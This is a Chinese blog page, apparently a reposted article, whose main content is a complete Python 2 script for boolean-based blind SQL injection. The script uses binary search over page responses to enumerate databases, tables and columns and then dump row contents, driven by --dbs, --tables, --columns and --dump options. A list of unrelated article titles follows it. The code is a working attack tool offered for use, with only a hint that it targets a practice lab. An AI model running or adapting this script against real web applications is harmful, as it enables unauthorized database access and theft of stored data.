基于布尔注入的Python代码
来源:互联网 发布:蘑菇插件mac 编辑:程序博客网 时间:2024/04/29 22:11
基于布尔型注入,能够爆数据库,表,字段的Python代码
#!/usr/bin/env python#coding=utf-8import sysimport requestsimport reimport binasciidef http_get(url): return requests.get(url) passdef dichotomy(sql): #二分法 left = 1 right = 500 while 1: mid = (left + right)/2 if mid == left: return mid break db_count_url = sql + "%d)--+" % mid html = http_get(db_count_url).content search_flag = re.search("You are in", html) if search_flag: right = mid else: left = middef getAllDabatases(url): search_db_num =url + "' and ((select count(schema_name) from information_schema.schemata) < " #查看数据库总个数 num = dichotomy(search_db_num) # print num print ("\t" + u"Database number: %d" % num) for x in xrange(0,num): search_db_len = url + "' and ((select length(schema_name) from information_schema.schemata limit %d,1) < " % x #看某个数据库名的长度 db_len = dichotomy(search_db_len) print (u"No.%ddatabase name number: %d" % (x+1,db_len)) db_name = '' for n in xrange(1,db_len+1): search_db_name = url + "' and ((select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))) < " % (x,n) #查看某个数据库名 db_name1 = chr(dichotomy(search_db_name)) # print search_db_name db_name = db_name + db_name1 print "\t" + db_namedef getAlltablesByDb(url, db_name): db_name_hex = "0x" + binascii.b2a_hex(db_name) search_tab_num = url + "' and ((select count(distinct+table_name) from information_schema.tables where table_schema=%s ) < " % db_name_hex num = dichotomy(search_tab_num) # print search_tab_num print ("\t" + u"tables number: %d" % num) for x in xrange(0,num): search_tab_len = url + "' and ((select length(table_name) from information_schema.tables where table_schema=%s limit %d,1) < " % (db_name_hex,x) #查看某个表名的长度 tab_len = dichotomy(search_tab_len) print (u"No.%d tables name number : %d" % (x+1,tab_len)) tab_name = '' for n in xrange(1,tab_len+1): search_tab_name = url + "' and ((select ascii(substr((select table_name from information_schema.tables where table_schema=%s limit %d,1),%d,1))) < " % (db_name_hex,x,n) #查看某个表名 tab_name1 = chr(dichotomy(search_tab_name)) # print search_db_name tab_name = tab_name + tab_name1 print "\t" + tab_namedef getAllcolumnsByTable(url, db_name, tab_name): db_name_hex = "0x" + binascii.b2a_hex(db_name) tab_name_hex = "0x" + binascii.b2a_hex(tab_name) search_column_num = url + "' and ((select count(distinct+column_name) from information_schema.columns where table_schema=%s and table_name=%s ) < " % (db_name_hex,tab_name_hex) num = dichotomy(search_column_num) print search_column_num print ("\t" + u"tables\'columns number : %d" % num) for x in xrange(0,num): search_column_len = url + "' and ((select length(column_name) from information_schema.columns where table_schema=%s and table_name=%s limit %d,1) < " % (db_name_hex,tab_name_hex,x) #查看某个字段名的长度 column_len = dichotomy(search_column_len) print (u"No.%d columns number: %d" % (x+1,column_len)) column_name = '' for n in xrange(1,column_len+1): search_column_name = url + "' and ((select ascii(substr((select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),%d,1))) < " % (db_name_hex,tab_name_hex,x,n) #查看某个字段名 column_name1 = chr(dichotomy(search_column_name)) # print search_db_name column_name = column_name + column_name1 print "\t" + column_namedef getAllcontent(url, db_name, tab_name, col_name): col_name_hex = "0x" + binascii.b2a_hex(col_name) search_content_num = url + "' and ((select count(*) from %s.%s ) < " % (db_name,tab_name) num = dichotomy(search_content_num) # print search_content_num print ("\t" + u" PAX:: %d" % num) c_num =col_name.split(',') #传入的字段个数 c = len(c_num) for x in xrange(0,num): print "No.%d columns:"% (x+1) for y in xrange(0,c): search_content_len = url + "' and ((select length(%s) from %s.%s limit %d,1) < " % (c_num[y],db_name,tab_name,x) #查看某个字段对应内容的长度 content_len = dichotomy(search_content_len) print (u"\tNo.%dcolumns\'s number: %d" % (y+1,content_len)) content_name = '' for n in xrange(1,content_len+1): search_content_name = url + "' and ((select ascii(substr((select %s from %s.%s limit %d,1),%d,1))) < " % (c_num[y],db_name,tab_name,x,n) #查看某个字段名对应内容 content_name1 = chr(dichotomy(search_content_name)) # print search_db_name content_name = content_name + content_name1 print "\t%s" % c_num[y] + ':\t' + content_namedef main(): if sys.argv[1]=='--dbs': getAllDabatases(sys.argv[2]) elif sys.argv[1]=='--tables': getAlltablesByDb(sys.argv[2],sys.argv[4]) elif sys.argv[1]=='--columns': getAllcolumnsByTable(sys.argv[2],sys.argv[4],sys.argv[6]) elif sys.argv[1]=='--dump': getAllcontent(sys.argv[2],sys.argv[4],sys.argv[6],sys.argv[8],) pass else: print '我不懂你的参数!'if __name__ == '__main__': main()
1 0
- 基于布尔注入的Python代码
- 基于报错注入的Python代码
- sql注入基于布尔/时间的盲注详解
- 浅谈盲注中的基于时间型和布尔型的注入方法
- 基于csg的布尔运算
- 基于布尔的盲注学习笔记
- Python中的布尔类型的注意点
- Python中空列表的布尔值判断
- python 远程线程注入代码
- python检测SQL注入的相关代码(参考lijiejie)
- python 写的sqli_lab显错式注入小代码
- 基于栈数据结构的算法(poj-布尔表达式)
- dll注入的代码
- python中的布尔值
- 布尔类型判断-python
- python 布尔类型
- python-布尔运算
- Python中的布尔类型
- 使用redis设计幂等接口
- 学习Java中遇到的一些问题
- Block语法基础
- 【软件开发工具——陌生的熟悉人】
- Pythagoras's Revenge
- 基于布尔注入的Python代码
- Promise 简介
- StudyJams-第07课_面向对象和创建实例
- CSS权威指南-line-height缩放因子
- dedecms后台验证码显示不正常的四种处理办法
- (转)wnmp(windows+nginx+mysql+php)环境搭建和配置
- 文章标题
- 周易六十四卦——咸卦
- 使用Spring AOP和Cookie做网站免登陆